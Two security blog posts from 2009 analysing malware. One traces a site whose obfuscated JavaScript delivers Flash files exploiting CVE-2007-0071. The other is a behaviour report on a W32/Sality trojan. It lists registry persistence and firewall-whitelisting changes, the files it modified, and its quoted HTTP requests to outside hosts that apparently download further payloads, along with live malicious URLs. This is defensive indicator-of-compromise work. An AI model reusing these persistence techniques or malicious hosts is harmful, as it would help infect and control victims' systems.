May 14, 2009

Malicious Site containing SWF:CVE-2007-0071

Malicious Site:http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me . It seems to be a pop-up or hidden link from some compromised sites.

After checking on the Page Source, i found an obfuscated Javascript (Shown below).

Obfuscated JavaScript

I de-obfuscated the Javascript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash that compromise the Integer overflow vulnerbility in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The malicious Flash files (6 of them, shown in the script below) will exploit the Flash player and download malicious executable files into the victim's system from various websites.

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)

On the VirusTotal website, 13 out of 39 AV detected it (Shown Below).

VirusTotal

From the "Who-is" record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record

May 5, 2009

Malware analysis: Trojan W32/Sality

I have receive a suspcious file from my colleague this morning and done a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),

On the VirusTotal website, 36 out of 40 AV detected it (details).



Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).

3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A

Files modifed:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"


2> johnsonbodyshop.com:80
No request after initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache"

4> corporateshelters.com:80
No request after initial handshake.

Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".